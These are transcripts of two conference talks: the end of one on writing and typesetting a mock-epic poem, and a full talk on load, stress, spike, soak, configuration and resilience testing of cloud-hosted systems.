And then a mock epic, like the mock epic of popes that I showed you, the duncead, is still quite a long thing. The duncead comes in three books and is still well over a thousand lines long and is not actually about gods, but it's sort of about pretend gods, like the goddess Dullness, for example, and the duncead ends with a wonderful scene, which you would quite easily recreate in this room if only you had a... Is there a light switch? Is this a light switch? Oh, yes, that'll work, yes. Okay, so here we go. The last two lines of the duncead. Thy hand, great Anarch, let the curtain fall and universal darkness bury all. End, you see. So that's how that goes. So it has a certain something. It's very much following the sort of scale of epic poetry, even if by introducing characters such as the goddess Dullness, it's not being entirely serious. So hence the mock. Well in the youth hostel, the action takes place over a single night. The choir arrives at the youth hostel, they stay the night there, and in the morning they leave again. And not a great deal actually happens. And so hence mock, mock epic. It's smaller, it's less serious. And here's the scene where the choir, having spent the night in the youth hostel, and having waited with some trepidation for their coach to arrive to take them onto their next venue, finally, they're sitting there in the, you have to imagine a somewhat sort of drab day in December in the Netherlands. Not that drab days in December are the exclusive preserve or even a defining feature of the Netherlands, just that this happens, this just happened to be one of those days. And sitting there with suitcases and that sort of thing in this youth hostel in which incidentally we were the only people staying. It's been made open especially for us in the middle of December, it's not really the time of year for youth hostels. And here's what happens. But stay, far off is heard a tiny hum, no louder than a fly, when it does strum with brittle wings the air. Is more a sound of purpose, does not miss a beat or varying its tone. Indeed it swells, it grows. The choir begins to heed, till suddenly a small boy does exclaim, Tis Rex, Tis Rex. Is it? It is, the same, I should insert here that Rex was the coach driver. Such rapid embarkation do we see, as if the singers minded were to flee and rather than a coach, the desperate choir boarded instead a chariot of fire. Now like a charioteer Rex yells, hold tight, and with a roar it zooms out of sight. Man, woman, boy, most solemnly they swore, from that day forth youth hostels, to a pour as nature doth a vacuum, and to find them lodging of a more commodious kind. First, in Holandsebyslos, leafy bowers, then midst fair puttons, bottle banks and flowers, they tarried. In the future who can say, in what Arcadian palaces they'll stay, in what palatial arcades they may find nightly relief from Toring's daily grind. But now our tale is told, our yarn is spun. It is time to call an end to fun, for we must find a moral, that we may as much in spirit as in heart be gay. Nor mere good humour from our verse derive, but holy learning that our souls may thrive. Fear not if thirst you fall, but like the dove, strive ere to seek those things which are above, where Christ sits, there may all we upward tend, and at the last to him in heaven ascend. And rather appropriately for that somewhat heavenly pointing ending, those last lines were actually written on an aeroplane. 
And imagine the cabin crew's surprise when I rang the bell when they came, instead of asking for a cup of water or something like that, I asked them, what's the name of this plane? Because I noticed that it's conventional when you're in this position of finishing a work on board a boat or a plane, rather than signing it with a place, you sign it with the name of the vessel. So there it is, Virgin Atlantic Rainbow Lady, September 16, 1997. And I just want to say some extra acknowledgments, as well as everyone I thanked already during the talk for their various bits of people, help, various bits of people, that sounds awful. Sorry, I just want to say a big thank you to Frostconn 11 for having me, and in particular for the immense hospitality that making this, that the organizers have shown, making coming here extremely easy as well as very pleasant. And to Der Peter for suggesting that I apply to tell this tale in this talk in the first place, which I told him in a pub in Cambridge last November, and he stopped me. And I thought it was just because he was, maybe it was because he was terribly bored, but I thought it was just that. He said, oh, you should come to Frostconn and talk about that. So if you have any, if I have a tool peaked your interest in seeing how this turns out, then do follow, of course, this is an S, SC3D, and I always tweet with a hashtag youth hostel whenever I have anything to say about that, so you don't have to read everything else I say. And I hope I'll actually have a finished version very soon. And although I, as I said, the focus was very much on making a real physical book in the first instance, I've also put quite a lot of effort into the PDF version. I will continue to improve on that as the paper version is finished, and it will become a more purely electronic work. There is actually a murder mystery hidden in the footnotes, which I haven't alluded to because there wasn't any time, but that's that. So if anyone has any questions, I'd be delighted to take them in the five minutes remaining. The one question I'm hearing is, can we go now? Yes! Yes, please. Have a wonderful time. Oh, sorry. I'm sorry. Sorry. Hi. Will your text be available to the public at some point? Yes. So there's, sorry, the question, I wasn't sure whether that was amplified. The question was, will the text be available to the public? That is one reason, one additional reason to follow the project is that it will be, in fact, the final version of the slides, which I'll make available through the conference site as well for ease of finding, will have a link to some version of the text. Yes. Yes, absolutely. Yes, absolutely, yes, indeed, that's largely the point of the electronic version is to have a version that I can share with everyone who didn't come to a dinner three years ago and won't have a physical copy. And indeed, the murder mystery I alluded to is not, is only hinted at in this book. That's the topic of my next work, which by extrapolation will be available in about 50 years. Is that all? You've been a wonderful audience. Thank you very much. Thank you. Thank you.
|
I will discuss how it took me nearly 25 years to produce a 40-page book: the writing, typesetting and binding of my mock–mock-epic poem The Youth Hostel, and how this led to my hacking on LaTeX font support, taking over the maintainership of psutils, becoming a Debian Maintainer, and working for Google. On the way, I found that the opposites of Larry Wall's cardinal virtues of the programmer can also be virtuous.
|
10.5446/32461 (DOI)
|
Welcome. My name is Sebastian. I'm going to talk about loading performance tests in the cloud. And I would like to give a brief overview of what I actually mean by that and why and how you can do performance tests. A little bit about me. My name is Sebastian. I'm on Twitter and GitHub and the Internet. And for the last seven-something years, I've done lots of consulting and development work with a strong performance, focus on performance and architecture, software architecture and system architecture. And this ultimately led to the founding of Stormforger now two and a half years ago where we built tools and a platform and services and we offer services around load testing and performance testing, basically HTTP-based systems. And now before we actually dive into the topic of performance testing and load testing, I would like to define or talk about some of the, or give some definitions about some of the basic words that are involved in this topic. And the first one would be performance. And it's quite interesting that that performance is often understood in multiple ways and used interchangeably with other terms that we will come to. And I just want to make sure that we are here on the same page what we are actually talking about. So performance is the, oh, that's interesting, the ability of a system to fulfill a task within a well-defined dimension. And this is basically efficiency. So the task could be a transaction or a web request or something like that. And the dimension could be time, then we get something like response time. Or it could be memory usage, disk usage, or even money. So you could also define performance in terms of the efficiency, how much does it cost to server-specific transaction. So the statement like one server can do 250 transactions per second within a defined quality criteria would be a statement of the efficiency of the system or about the performance of the system. This is heavily simplified, of course. And the next term I would like to talk about, which is often used interchangeably with performance, is scalability. And actually they are not that much the same. They are not really, really comparable to one another. Where performance was the efficiency of a system to fulfill the task within a defined dimension, scalability on the other hand describes the effectiveness on how you can grow capacity of your system by adding resources. So the degree on how effective you are in translating resources into capacity. And if you take the statement from before like one server does 250 requests per second within a defined quality range, then the statement of 10 servers can do 10 fold would be actually a very good scalable system. Like 100% of all the additional resources are translated into additional capacity for the system or throughput in this case. There are different mathematical models and categories to describe scalability, which I won't go into. But just to give you a good distinction of what performance means and what scalability means because that will become important later on in this talk. So I would like to ask a question that was asked by Jonas Bonnier. I'm not sure how to pronounce his name. He's the founder and CTO of LightBand, the Aka framework. Maybe someone heard of it. And he gave a presentation I think many years ago where he asked two really nice questions. The first one was how do you know that you have a performance problem? And the answer is if your system is slow for a single user, then you have a performance problem. I like this sloth. 
And the next question he asked in this presentation was obviously how do you know if you have a scalability problem or a scaling problem? And the answer is if your system might be or is fast for a single user but really slow under heavy load or high traffic. And this is a really nice visualization of what is the core difference between performance and scalability. And Robert Johnson, he was the director of software engineering at Facebook, wrote an interesting article in the Facebook engineering blog also in 2010 I think where Facebook was really small like 500 million users. They just reached 500 million users. And he talked about how they do performance optimization projects and scalability improvement project at Facebook. And he made a couple of really interesting statements. First was that scaling usually hurts performance. So they are contradicting each other. And also that efficiency projects, so efficiency means performance. That efficiency project really gives you enough improvement to have a big enough effect on scaling. So they are reaching an area where it is more effective overall to have a better scaling system versus a better performing system. So they are sacrificing efficiency for scalability. And another code was that efficiency is important too but they think of it as a separate project from scaling. So they separate this completely. So next up, performance testing. So now we know what performance is and what is not. And now we take a look at what performance testing actually means. And the best definition, this is slightly completely in English because the English Wikipedia is much, much better than the drum one. And the article on software performance testing I think it is has a really nice description of performance testing. So when you do performance testing or this is a testing practice in general where you determine how a system performs under a particular workload and you take a look at the responsiveness and stability of the system that you are testing. And to put it in other terms, they all have in common, this is a category of testing methods and testing practice and they all have in common that they all induce a well-defined workload to a system that is under test or SUT system under test. And you do that in order to observe the system's behavior and to verify performance-related characteristics or if you need to guarantee certain service levels then you can use performance tests in order to verify those characteristics. And you also want to do performance tests to simply understand the behavior, the internal behavior of your system that you are testing. There are lots of categories or sub-testing methods that could be summarized as performance tests. They are not all very well defined or it is oftentimes not as simple as it sounds to say, okay, this is a stress test, this is a spike test. It is more about what the goal is that you want to achieve for selecting the right testing methods in your case. But we will go into some of those testing techniques later in this talk. So now we have one final piece to make the talk title complete. We have to talk about this cloud thing. So the cloud. I am not here to sell you the cloud, I just want to describe what we have by all those cloud vendors that are available to us. We get basically infrastructure as a service, so we get networks, compute, storage and all those things. We get a platform as a service sometimes. 
But the most important thing is that we get APIs and automation across all those services and components. And we get this on-demand which makes it really easy to achieve a cost-effective and scalable system. So now to the actual topic. So what about performance tests in this cloud? And you could now ask the question, why is this now relevant? Because I just told you that the cloud is scaling for you. You just buy more stuff, swipe your credit card once more and boot up more servers, whatever. And the obvious problem with that is that scaling resources doesn't necessarily mean to scale an application. This is only true if you have a very well-defined system and software architecture that powers your entire application. And to give you a really, really stupid and simple example how this isn't true or this... No, let's skip that. So maybe you're running in the AWS cloud. I'm not sure if you're familiar with it, but it doesn't really matter. Maybe you have an automatic load balancer that scales automatically for you, which is great and fine. There are pitfalls there as well, but in general, you're good. Then you have your applications or web server tier that you have provisioned in an auto scaling group, which means that it will automatically add more resources to your problem if you have a higher throughput or higher load on your system. And then, of course, you have some sort of a persistence layer maybe behind that. And if you have this scaling well, this scaling well, and only one master server, for example, then your thing will break eventually. So it is maybe a too simple example, but just to give you an idea that you just can't ramp up your resources and get automatically more capacity out of the system. If you are a bit familiar with the cloud services that are available today, then you might think of what about all those fully managed services that you get from them, where the provider actually cares about everything. You just say what you need and how much you need, and you pay for it, and they manage basically all the provisioning of the resources below that higher level service. Examples for that would be AWS Lambda or the Google compute equivalent. I think it's called functions, but I'm not really sure. There is this DynamoDB database and Datastore and event streams and queues and everything, and those services aren't really resources, but they are higher level services that are managed by the cloud provider for you. So in this case, what is the problem with that? And basically, it boils down to complexity, and complex systems are, oh, God, what is Wechselwirkung in English? I have no idea. Yeah, if systems interact with each other to a high degree, then they are complex, and this is something that I've taken from the physics area. So the problem is complexity, and the complexity hasn't simply vanished. It's not like that magically you are moving from your on-premise data center to the cloud, and everything is simple and easy. It might be easier to get started and to build more sophisticated systems, but in the end, either you have some additional complexity there or your provider is managing the complexity for you. So some of the complexity is hidden, and other complexity is, yeah, it has shifted from your side and from your operations team, for example, to the teams at AWS and Azure and whatever.
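A tiny back-of-the-envelope sketch in Python of the earlier point about the single database master behind an auto-scaled web tier: end-to-end capacity is bounded by the weakest tier, so adding web servers stops paying off once the database is the limit. All numbers here are invented.

    def end_to_end_capacity(web_servers, rps_per_web_server, db_capacity_rps):
        """Rough model: throughput is capped by the slowest tier, here a single DB master."""
        web_capacity = web_servers * rps_per_web_server
        return min(web_capacity, db_capacity_rps)

    # Auto scaling adds web servers, but the single database master stays at 1000 rps.
    for n in (2, 4, 8, 16):
        print(n, "web servers ->", end_to_end_capacity(n, 250, 1000), "rps end to end")
    # 2 -> 500, 4 -> 1000, 8 -> 1000, 16 -> 1000: beyond four servers nothing improves.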
But it turns out that this complexity often has a non-trivial impact on performance characteristics of your system, and this is especially true for all those fully managed services that are available. And the only thing that you can do to deal with this complexity is building up a good understanding on what you are actually dealing with. And first of all, you have to know your own application, your own software architecture and system architecture that you are responsible for, that you are designing in terms of performance characteristics. Yeah, system software architecture and you also need to know your runtime environment, and in this example, it would be the cloud runtime environment that you are using. And this also extends to all those services that you are utilizing, for example, from the AWS cloud or from any other cloud vendor, and all those other third-party vendors that you are using, I don't know, logging as a service, database as a service, there are so many as a service things that you could possibly use, and you need to have a basic understanding, at least a basic understanding, what is happening there when you have a certain, yeah, traffic scenario or load scenario on your system. So, this is quite obvious that you, of course, need also conduct performance tests and load tests and all those kinds of testing in the cloud. And I would like now to go briefly over some of the, yeah, more important testing methods and take a look at what they actually mean and what you can achieve with those and what is particularly important when it comes to looking at the cloud. You said we have to be able to understand what's going on. Yeah. We agree with that, but the problem with all these cloud stuff is that they try to make fog. They make fog. So, we cannot understand the AWS cloud exactly going on. Yeah, and let me quickly repeat the question and then move the discussion later on. The question was in the, yeah, how can you build up an understanding of a system that is not open, right, is it or visible or, okay, yeah, but let's skip this discussion to later. Okay, first off, we have load testing, which is maybe the simplest and, yeah, no, it's the simplest form of a performance test where you induce a normal or an expected workload to your system and you want to take a look at the, maybe at the latency, at the throughput or error rates or whatever criteria that is important to you. And you usually do that in order to verify non-functional requirements or to see if you are able to hold your service level agreements. Yeah, but that's basically what I want to say about load testing. The other testing methods are a bit more interesting. Stress testing, for example, is basically a load test, but you are now explicitly going beyond the normal or expected workload that you expect to see on your system. And you do that to see how the system behaves at its design limits, for example, or when you, no, you want to understand how your system behaves at those limits. And you can also utilize stress testing or a series of stress testing to figure out what the capacity of your system actually is. You can increase the traffic over time and then see the point when you violate your quality criteria or maybe when your system eventually, yeah, doesn't serve any requests at all because, I don't know, the server died or so. Oh, yeah. Yeah, I just told you that. You have to define quality criterias, but that's basically the same with a load test. 
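In practice you would use a dedicated load testing tool for this rather than writing your own, but as a hedged, minimal sketch of the idea of driving traffic in phases and checking it against defined quality criteria, something like the following Python script shows the shape of it. The target URL, rates and thresholds are made-up placeholders, and the once-per-second scheduling is deliberately crude.

    import time, statistics, urllib.request
    from concurrent.futures import ThreadPoolExecutor

    TARGET = "http://localhost:8080/health"        # placeholder system under test
    PHASES = [(60, 50), (60, 100), (60, 200)]      # (duration in seconds, target requests/s)
    QUALITY = {"p95_ms": 300, "error_rate": 0.01}  # example quality criteria

    def one_request(url):
        start = time.perf_counter()
        try:
            with urllib.request.urlopen(url, timeout=5) as resp:
                ok = resp.status < 500
        except Exception:
            ok = False
        return (time.perf_counter() - start) * 1000.0, ok

    def run_phase(duration_s, rate_rps):
        latencies, errors, total = [], 0, 0
        deadline = time.time() + duration_s
        with ThreadPoolExecutor(max_workers=50) as pool:
            while time.time() < deadline:
                futures = [pool.submit(one_request, TARGET) for _ in range(rate_rps)]
                for f in futures:
                    ms, ok = f.result()
                    latencies.append(ms)
                    errors += 0 if ok else 1
                    total += 1
                time.sleep(1)  # crude one-second tick; real tools schedule far more precisely
        p95 = statistics.quantiles(latencies, n=100)[94] if len(latencies) > 1 else float("inf")
        return p95, errors / max(total, 1)

    for duration, rate in PHASES:
        p95, error_rate = run_phase(duration, rate)
        ok = p95 <= QUALITY["p95_ms"] and error_rate <= QUALITY["error_rate"]
        print(f"{rate} rps: p95={p95:.0f} ms, errors={error_rate:.1%}, within criteria: {ok}")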
And then you steadily increase the traffic in multiple phases, for example, and you see when, and you take a look at when you are hitting the, or when you are violating the quality criterias that you defined before. Yeah. Right. And when you conduct a stress test, it's really important to have a deep look or you have the ability to have a deep look at your system. So you should have all your monitoring tools and profiling tools available so that you can actually learn something when you are inducing the traffic into your system. And you can use a stress test not only to see what the capacity is, obviously, but you can also start to identify the next bottlenecks, for example, if you want to push the boundary even further. And so you need to have some data and idea where to look next in order to improve the performance of your system. And it's a good tool, like I already said, to determine the capacity per resource. So you can do a stress test and just use one application for example, and then see how much users or how much requests or how much acts you can handle using that particular resource. And with that idea in mind, you can basically do a scalability test. You can now change the perspective on how effectively can you translate more resources into more capacity to your system, more requests per second, more users, and so on. And this is basically the foundation for capacity planning and cost estimation because you are maybe a fancy startup or so, and you haven't even launched a product, but you have a hockey stick growth, and you know that you have, I don't know, 10-fold the users per month or so. Then you need to know what will it cost in order to handle this growth scenarios. And what you do for scalability testing is basically a series of stress tests where you say, okay, you have maybe five resources, like five servers, and you measure when do you begin to violate your quality criteria. And in this case, I don't know, 170 capacity, maybe request per second, or concurrent users, or connections, it doesn't really matter. And then you add more resources, maybe more application servers, and then you get maybe roughly the double throughput, and then you do it again, add more resources, and over time, most certainly it will flatten out. And this is now a good basis to see, okay, maybe we just need to go in that area, and we are basically good because it works as we expected to work. We have almost linear growth, perfectly fine. But if we need to go here, then we might have a problem, and we might actually need to act immediately to fix this scenario. To give you a comparison, I initially talked about performance versus scalability, and that Facebook actually separates this into two different project areas. So what will happen if you increase the performance by 10%, then you will get something like that. Basically the same curve, but 10% higher. But what happens if you fix the scalability problem, then maybe in the beginning it's more or less the same, but the more you grow, the more resources you add, the more impact does a scalability project have on performance. And I'm not saying that you should only focus on scalability because most of us don't really run such a big system that this will really be a problem, but it is important to see the difference so that you actually know what you are aiming for when you are working on performance or scalability. Next up we have spike testing. 
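Before moving on: once you have such a series of stress tests, the evaluation itself is only a few lines. Here is a hypothetical Python sketch with invented numbers, in the spirit of the example above (five resources giving a capacity of roughly 170, then adding resources and watching the curve flatten).

    # Measured capacity (e.g. requests/s within the quality criteria) per resource count.
    # All numbers are invented for illustration.
    measurements = {5: 170, 10: 330, 20: 610, 40: 950}

    baseline_resources, baseline_capacity = 5, measurements[5]
    per_resource = baseline_capacity / baseline_resources  # what one resource buys at the baseline

    for resources, capacity in sorted(measurements.items()):
        ideal = per_resource * resources   # perfectly linear scaling
        efficiency = capacity / ideal      # 1.0 means every added resource fully pays off
        print(f"{resources:>3} resources: {capacity:>4} capacity, "
              f"ideal {ideal:.0f}, scaling efficiency {efficiency:.0%}")
    # Where the efficiency starts dropping is where the curve flattens, and that is
    # the region that matters for capacity planning and cost estimation.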
And spike testing tries to answer the question: how does your system behave under extreme load spikes? You want to know whether you can utilize the elasticity of the cloud well enough and whether you can react fast enough to sudden changes in the traffic pattern hitting your system. There are several scenarios you can actually plan for. For example, the marketing division has the crazy idea to send a push notification to half a million users at the same time, and maybe you want to prepare for such a scenario, or talk them out of it and distribute it more over the day. Or you have a mailing campaign or an advertisement spot on TV, or you are about to release a big feature and, again, marketing says this will go viral, one hundred percent, and then you need to be prepared for those scenarios. Basically you are running a load test, but you compress the traffic into a very sharp spike, and then you take a look at how well you can absorb these spikes, where your system fails first and how it fails, which is really valuable information, especially so that your people actually know what to do and how to mitigate such a sudden increase in traffic. Then we have soak testing, sometimes also called endurance testing, which is kind of the opposite of a spike test: you want to know how your system behaves under a normal load situation, but for a very, very long time. This is basically a long load test; the definition of "long" is up to you, but normally it means many hours, maybe even days, and that depends on what application you are looking at. If it's an application that you only deploy once a quarter, then maybe you want to run longer tests, because you know that your systems run for longer periods of time. But if you are deploying like 50 times a day, then maybe it's not that important to ensure that you can run the system for many days without any memory leaks or disks filling up or whatever. It's also quite useful for performance troubleshooting in that area. I worked on an advertisement server and we had a really strange situation where, for a day or two after a deployment, we suddenly saw strange CPU spikes on those ad servers. So we built an artificial test aimed at a specific code path and just hammered it for about 10 hours, many billions of requests, and then finally saw what the problem was. And this is what I meant by saying that those testing methods aren't really clearly distinguished: it's kind of a soak test, but it's also kind of a performance troubleshooting test. You get the idea. Okay, next up is what I think is the most important testing method when it comes to the cloud, and this is configuration testing. Configuration testing changes the perspective to: what kind of changes do you see in the observable behavior of the system when you are changing the environment? Normally you are not changing the environment but the test; now you are actively changing the system that you are testing, and you run the same test over and over again to get a comparison between the two, or between multiple sets of configurations. Can we do this? I will come to that. Give me a minute.
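Reaching back to the spike scenario for a moment, a spike profile can be sketched with the same load-shape mechanism; again, the baseline of 50 users and the spike to 1,500 are purely illustrative:

```python
# Spike profile: steady baseline, one sharp spike, then recovery.
# All numbers are illustrative.
from locust import LoadTestShape

class PushNotificationSpike(LoadTestShape):
    stages = [
        # (end of stage in seconds, concurrent users)
        (600, 50),      # 10 min of normal traffic
        (900, 1500),    # 5 min spike, e.g. right after a push notification
        (1800, 50),     # 15 min back at baseline to watch the recovery
    ]

    def tick(self):
        run_time = self.get_run_time()
        for stage_end, users in self.stages:
            if run_time < stage_end:
                return (users, 200)   # high spawn rate so the spike really is sharp
        return None                   # test finished
```

As for configuration testing, the essential point from above is that the identical test is repeated against several configurations and the results are compared.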
So this implies that you have to do a series of tests obviously because with one test you can't compare anything to something. And it is a really nice technique to learn about the environment that you are running in. And to give you some examples, what I'm actually talking about when I talk about configuration, when we go from top to bottom in the cloud, this would be starting with instance types for example. You have compute optimized, memory optimized, IO optimized and whatever instance types. You have different sizes and burst performance and normal performance and whatever. And this is a, yeah, I think the most practical example on what you want to do when you are running in the cloud and you want to do a performance configuration test. Maybe you want to do it to increase the throughput but maybe you also want to do this in order to get roughly the same throughput but at a much lower cost which would be optimizing the cost efficiency in that regard. Then we have many other services. I just took a couple of examples here. Auto scaling configuration for example where you have to define scaling. You basically define a group of servers and then you define scaling policies when to add more resources, how long to wait before adding even further resources when to scale down, how long does it take to boot up those new instances before they become available. Those are, there are many, many parameters that go into how to configure and how to deal with an auto scaling group that you maybe want to know how this behaves if you are actually using it beyond reading the documentation and clicking buttons in the UI. Then there is throughput provisioning and what I mean by throughput provisioning are those managed services that I talked about earlier where you basically say, okay, I want to have this event stream. I need, I don't know, 20 megabits of throughput there. You can roughly model it about against your, against your business logic. But sometimes you forget to model bugs for example and then you, you, you see that you are injecting, I'm sorry. Yeah. Yeah. The main problem is you forget to model, model issues that are not there by design and you should always go ahead and run a dynamic test to figure out if you are actually right, right about your assertions there. And the next point would be, yeah, the, the, are you using the, those services that are offered by your, by your cloud environment or maybe by other vendors. Are you using them in a right or optimal, optimal way? There are not only in the cloud but basically everywhere, many pitfalls that you can take when you, when you just start to look at how this, how those services and systems behave under, under load. And the list goes on. Obviously, this is not, not so much more cloud specific, but you have the hypervisor most of the time when you run on the virtualized environment. And even on AWS, you have some little knob here when it comes to the hypervisor that you can decide. Then you have the operation system level, obviously network tuning, kernel tuning, all those settings that are, are available to us. You have your web server application server stack where there are many configuration options, versions, dependencies that you can compare to one another. But also software configuration, I don't know, like database connection pools, timeouts, and so on and so forth. And also maybe even software dependencies, even things that you just use but don't manage by yourself can have a significant impact on the performance of your system. 
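A hedged sketch of what such a comparison series could look like in practice: the same test plan is run headless against several pre-provisioned environments that differ in exactly one configuration dimension; the hostnames, instance types and pool sizes below are invented:

```python
# Run the identical load test against several configurations and
# collect the results for a side-by-side comparison.
import subprocess

CONFIGS = {
    # label               -> environment provisioned with that configuration
    "c4.xlarge_pool50":  "https://perf-c4.example.com",
    "m4.xlarge_pool50":  "https://perf-m4.example.com",
    "m4.xlarge_pool200": "https://perf-m4-bigpool.example.com",
}

for label, host in CONFIGS.items():
    subprocess.run([
        "locust", "-f", "loadtest.py", "--headless",
        "--host", host,
        "--users", "300", "--spawn-rate", "30", "--run-time", "10m",
        "--csv", f"results_{label}",   # writes results_<label>_stats.csv etc.
    ], check=True)

# Afterwards compare throughput, p95/p99 latency and error rate per label,
# either to get more capacity or the same capacity at lower cost.
```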
And with a configuration test you can simply compare one version to another, or one TLS library to another TLS library, and things like that. Configuration testing is actually something that we do 100% of the time when we do consulting work for our customers; it is the most important technique to help them improve their performance characteristics. Next up is something I haven't really found an established term for, but maybe I just missed it. I like to call it availability or resilience testing. It is a little bit inspired by the principles of chaos engineering; I don't know if you have heard about them, they come from Netflix, who published something like a manifesto on how to really make sure that your system is as resilient as possible. All the things I talked about before are things that you have directly under control. Maybe you also control when and how you deploy, but most of the time you forget that sometimes you have to deploy even when your system is under heavy load, for example when you need to roll out a hotfix because something is broken, and maybe you want to do that with zero downtime. Then you have to ask the question: are you really sure that you can run a zero-downtime deployment under heavy load? This is something you should at least think about testing and verifying. And when you are running in a cloud environment, you are basically confronted with constant changes to your infrastructure. There are automated tools that spin up new servers and shut them down again; maybe you need something like a service discovery tool, and are you really sure that you see those changes fast enough so that you don't run into any problems? These scenarios do happen all the time, but most of the time it is simply forgotten that you should not only try this out on your dev environment and see, okay, the new server is booting up, the service is available, everything is good. Things suddenly change when you are seeing a lot of load on your system. And the list goes on with failure scenarios and verifying that your failover mechanisms are actually working: what happens if the network connection to your caching server gets slow or drops packets, or one of the database read slaves suddenly dies? Are you able to cope with those scenarios when you are confronted with a high-traffic situation? Okay, then I would like to raise a question: is this any different from what we actually did, or had to do, before we were able to run things in the cloud and didn't have to care about the servers ourselves anymore? And I would clearly answer this question with "jein", yes and no. I think the requirements and the testing methods haven't really changed; basically they have been around for decades, and everyone knew what performance tests and load tests were a long time ago. But what has really changed is the ability, the possibility, to run those tests in the cloud context. And the most important thing to keep in mind here is that test environments are something really interesting when you take a look at the cloud and what the cloud actually provides you with.
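Before coming to test environments, here is a small sketch of the kind of failure injection mentioned for resilience testing: terminating one random instance of an Auto Scaling group while a load test is running, and then watching error rates, latency and how long the replacement takes. It assumes boto3 with AWS credentials and an existing group; the group name is invented:

```python
# Chaos-style failure injection during a load test (sketch).
import random
import time

import boto3

ASG_NAME = "my-service-asg"   # placeholder name

autoscaling = boto3.client("autoscaling")
ec2 = boto3.client("ec2")

def kill_random_instance(asg_name):
    group = autoscaling.describe_auto_scaling_groups(
        AutoScalingGroupNames=[asg_name])["AutoScalingGroups"][0]
    victim = random.choice(group["Instances"])["InstanceId"]
    print("terminating", victim)
    ec2.terminate_instances(InstanceIds=[victim])

if __name__ == "__main__":
    time.sleep(600)               # let the load test reach a steady state first
    kill_random_instance(ASG_NAME)
```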
If you really utilize all these APIs and automation possibilities, then suddenly it becomes really easy to provision test environments, not, not QA environments, but really perform production grade performance test environments, or maybe even scaled beyond the performance environment, the production environment to see a few, if you can handle larger, larger traffic. And by test environment, I mean everything from infrastructure, service, service, service configuration, code deployments, everything. If you, if you are able to, to automate this, then it might be really easy to, to spin up a performance test environment in the morning. And I don't know, maybe you have to wait one hour or so to load all the data into the environment. But then you have an environment that you can actually work and play, play with. And if you, if you do that correctly, then, then you can do this a lot more cost effective and more flexible than we were used to do it. I have one more quick question. Is someone working in an environment where you have one per test environment where you can run like a quality, like a QA environment for performance? One hand, two hand, three. Okay. So, so you have, okay, do you have three environments more or more than three environments? Two. Four. Nice. Okay. So, yeah, the, the problem usually is that, that performance environments that are, that are capable of, of handling this traffic and are comparable to a production environment are really expensive because you just have to buy lots of resources to, to mirror the production environment. And if you now have to do this like two, three, four and more times, it is get, it gets even more, more expensive. And it is quite a, quite a mismatch because you have now these days this pizza size teams like maybe 10 of them. And then you have to wait in order in line before you can actually, yeah, do your performance test of your feature or your product or your service that you are launching. And I know it's, I know it's really hard and maybe it's just a vision, but, but imagine that you can provision such an environment on demand for the, for the period of time that you needed for and then shut it down afterwards and save lots of money and time to, to manage and keep the systems up and running 24 seven, even if you are not using them 24 seven. Okay, but there is one remaining problem or one challenge, which is, yeah, the ability to reproduce your test environment perfectly, even though if you can automate all those provisioning steps like like creating the infrastructure networks firewall rules and servers and services, you have this little nasty thing called state in your system, you have product databases, for example, but you also have a state in terms of caches or file system caches application. There are many, many areas where you have state in your, in your system. And for me, it's a pretty much an unanswered question how to, how can you deal in an elegant way so that you can set your system in a, in a state that is a good starting point to make comparable performance tests. And how do you, how do you manage those, those test data? It's, it's quite a, quite a challenging task, at least from, from our, our experience. It's not so clear if you're, if you can use production data, if you have to use fake data, is it comparable to production data? Is it too optimistic, too pessimistic? There are many challenges and on, on how to, how to create or deal with test data and how to, how to manage it. 
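Going back to the provisioning point for a second, here is a hedged sketch of what "spin the whole performance environment up in the morning, tear it down in the evening" can look like with an infrastructure template, here CloudFormation driven through boto3; the stack name, template file and parameters are invented:

```python
# Create a complete performance-test environment from a template,
# wait until it is up, run the tests, and delete it again.
import boto3

cloudformation = boto3.client("cloudformation")
STACK_NAME = "perf-env-feature-x"          # placeholder name

with open("perf-environment.yaml") as template:
    body = template.read()

cloudformation.create_stack(
    StackName=STACK_NAME,
    TemplateBody=body,
    Parameters=[
        {"ParameterKey": "InstanceType", "ParameterValue": "m4.xlarge"},
        {"ParameterKey": "DesiredCapacity", "ParameterValue": "5"},
    ],
    Capabilities=["CAPABILITY_IAM"],
)
cloudformation.get_waiter("stack_create_complete").wait(StackName=STACK_NAME)
print("environment ready: load the test data, run the tests ...")

# ... run the performance tests against the new environment ...

cloudformation.delete_stack(StackName=STACK_NAME)   # stop paying once done
```

What this sketch deliberately leaves out is exactly the state problem discussed above: databases, caches and test data still have to be brought into a comparable, well-defined starting point for every run.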
Maybe data schemas change for one feature, and then you need a good mechanism to apply that data so that it stays comparable from one environment to another. And how do you automate all this state handling and data handling? I don't have a good answer for that; I'm happy to hear what you think about it. I'm almost done, so a quick recap. I talked about how scaling resources is not the same as scaling applications. I think the most important reason why this is still the case is simply complexity: it's still there, it's just maybe hidden from us. And the only way out of this problem is building up a better, good understanding of how our systems behave. I would like to encourage you, if you are already running stuff in the cloud, to take the work that you do in provisioning your production environments and try to apply it to performance testing environments as well. And in the end, you want to have the cycle, right? Not only for software engineering and development; it should also apply to all those non-functional criteria that we have just talked about. You want to design something, you want to implement it, maybe not in code but in infrastructure, you want to measure it, you want to validate it, and you want to do it over and over again. And this would be the end. Thank you. So many hosting providers are switching from renting servers to renting services. So when you rent a service and the performance varies every day, what can I do for testing in this case? So the question is that hosting providers are switching from servers to services, and you actually see a fluctuation in the performance of those services, okay. And how can I answer that, what was the actual question? Sorry. Okay. So you are now going from renting a server to renting a managed database, and you fear that the quality or the performance of the system isn't as stable as it used to be when you rented a server and managed the database yourself, right? Okay. I think it doesn't really matter what kind of tools you are using; there is no real difference between perf testing your own server with a database that you manage versus a database that you basically rent, because in the end it's a database, you can talk to it just the same, so you can basically use the same tools. And your statement that you are seeing different performance characteristics of those systems is a good argument for running these performance tests in the first place, because you want to see these performance differences. For one, you could tell your database provider: hey, every night between this time range the performance degrades, what is happening on your end? And you can prove it, because you have a series of tests. Or maybe you have some configuration problems and you can do some configuration tuning, which would be the case for a configuration test where you compare multiple settings. Or maybe you can provision more or fewer resources for your managed database.
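To make that "series of tests" concrete, one pragmatic option is a small recurring baseline measurement against the rented database, always with the same fixed workload, whose results are appended to a time series; the connection details and the query are placeholders, and psycopg2 is assumed for a managed PostgreSQL:

```python
# Nightly baseline against a managed database: the same fixed workload
# every time, results appended to a CSV so day-to-day drift becomes visible.
import csv
import datetime
import statistics
import time

import psycopg2

QUERY = "SELECT count(*) FROM orders WHERE created_at > now() - interval '1 day'"

conn = psycopg2.connect(host="db.example-provider.com", dbname="shop",
                        user="perf", password="secret")
cur = conn.cursor()

latencies_ms = []
for _ in range(200):
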